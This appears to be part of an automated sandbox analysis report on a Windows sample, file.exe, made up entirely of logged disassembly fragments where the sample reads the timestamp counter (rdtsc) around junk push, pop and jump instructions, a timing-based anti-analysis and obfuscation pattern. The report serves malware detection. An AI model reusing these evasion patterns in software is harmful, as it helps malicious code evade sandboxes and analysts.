          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860946 second address: 860950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863FE8 second address: 863FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBA8CCF3D56h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863FF7 second address: 86400B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA8CEE23CEh 0x00000008 jng 00007FBA8CEE23C6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86400B second address: 864011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8638B3 second address: 8638B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8638B9 second address: 8638BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8638BD second address: 8638D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863B87 second address: 863B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863B8B second address: 863BA5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA8CEE23CDh 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BA5 second address: 863BBD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA8CCF3D62h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BBD second address: 863BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBA8CEE23C6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866502 second address: 86651D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FBA8CCF3D65h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86651D second address: 86652C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86C68C second address: 86C690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86C690 second address: 86C69A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86C823 second address: 86C839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jbe 00007FBA8CCF3D56h 0x0000000b jne 00007FBA8CCF3D56h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86C839 second address: 86C83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86C83D second address: 86C86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FBA8CCF3D66h 0x0000000f jmp 00007FBA8CCF3D5Eh 0x00000014 pop edi 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CBE5 second address: 86CC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jmp 00007FBA8CEE23CBh 0x0000000e jne 00007FBA8CEE23CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CD63 second address: 86CD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D5Fh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CEBE second address: 86CED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FBA8CEE23C6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CC01 second address: 81CC55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+13C4F401h], eax 0x00000012 mov ebx, dword ptr [ebp+13C75D0Ch] 0x00000018 call 00007FBA8CCF3D64h 0x0000001d mov dword ptr [ebp+13C6BAEBh], edx 0x00000023 pop edi 0x00000024 add eax, ebx 0x00000026 mov dword ptr [ebp+13AC1EF0h], ebx 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push esi 0x00000030 push edi 0x00000031 pop edi 0x00000032 pop esi 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CC55 second address: 81CCAD instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA8CEE23C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e jmp 00007FBA8CEE23CFh 0x00000013 pop esi 0x00000014 nop 0x00000015 mov ecx, dword ptr [ebp+13AC275Ah] 0x0000001b push 00000004h 0x0000001d mov edi, dword ptr [ebp+13AC29D2h] 0x00000023 call 00007FBA8CEE23D4h 0x00000028 pop edi 0x00000029 nop 0x0000002a jmp 00007FBA8CEE23CBh 0x0000002f push eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 js 00007FBA8CEE23C6h 0x00000039 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8707C6 second address: 8707D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FBA8CCF3D56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8707D4 second address: 8707EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CEE23CCh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8707EA second address: 8707F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870948 second address: 870952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870952 second address: 870956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870956 second address: 87096D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBA8CEE23C8h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874763 second address: 87479A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Fh 0x00000007 jp 00007FBA8CCF3D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jmp 00007FBA8CCF3D64h 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007FBA8CCF3D56h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87479A second address: 87479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87479E second address: 8747B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBA8CCF3D5Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DFBD second address: 87DFCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA8CEE23CDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DFCF second address: 87DFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA8CCF3D62h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DFEC second address: 87DFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF74B second address: 7CF77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FBA8CCF3D65h 0x0000000f pop esi 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF77C second address: 7CF782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF782 second address: 7CF786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BDCB second address: 87BDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BDD1 second address: 87BE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D69h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FBA8CCF3D58h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FBA8CCF3D5Bh 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BE05 second address: 87BE0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BE0D second address: 87BE21 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA8CCF3D56h 0x00000008 je 00007FBA8CCF3D56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BE21 second address: 87BE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C118 second address: 87C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C11E second address: 87C153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA8CEE23D6h 0x0000000c jmp 00007FBA8CEE23D8h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C153 second address: 87C169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA8CCF3D5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C724 second address: 87C72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C72A second address: 87C733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C733 second address: 87C737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C737 second address: 87C752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D67h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C752 second address: 87C758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D063 second address: 87D067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D067 second address: 87D06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D06B second address: 87D07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D636 second address: 87D65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA8CEE23C6h 0x0000000a pop edi 0x0000000b jg 00007FBA8CEE23CCh 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBA8CEE23CDh 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887E77 second address: 887E7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887E7D second address: 887E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 886F5E second address: 886F75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBA8CCF3D56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FBA8CCF3D6Fh 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8870DF second address: 8870EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8870EA second address: 88710D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007FBA8CCF3D68h 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88710D second address: 887129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887129 second address: 88712D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88712D second address: 88714C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FBA8CEE23D5h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887500 second address: 887531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBA8CCF3D5Ah 0x0000000e jmp 00007FBA8CCF3D65h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8877EA second address: 8877EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8879B9 second address: 8879BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8879BF second address: 8879D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FBA8CEE23C6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8879D1 second address: 8879F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA8CCF3D5Ch 0x00000008 jnc 00007FBA8CCF3D56h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA8CCF3D66h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B93 second address: 887B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B98 second address: 887BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBA8CCF3D56h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F2B0 second address: 88F2F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FBA8CEE23C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FBA8CEE23D6h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 jbe 00007FBA8CEE23C6h 0x0000001c jns 00007FBA8CEE23C6h 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 pop eax 0x00000028 jno 00007FBA8CEE23C6h 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F2F4 second address: 88F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D68h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F310 second address: 88F324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jno 00007FBA8CEE23C6h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F324 second address: 88F328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6BB second address: 88F6C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6C7 second address: 88F6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6CB second address: 88F6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6D7 second address: 88F700 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA8CCF3D56h 0x00000008 jl 00007FBA8CCF3D56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007FBA8CCF3D5Ah 0x00000019 jnp 00007FBA8CCF3D56h 0x0000001f pop esi 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F898 second address: 88F8BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA8CEE23CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA8CEE23D0h 0x0000000f jnp 00007FBA8CEE23C6h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FA17 second address: 88FA24 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA8CCF3D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FA24 second address: 88FA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FA2A second address: 88FA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FA3A second address: 88FA5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBA8CEE23D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FE9E second address: 88FEBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FEBA second address: 88FEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FEC5 second address: 88FEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890036 second address: 89003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8906D2 second address: 8906F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890D70 second address: 890D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CEE23D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890D8C second address: 890D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
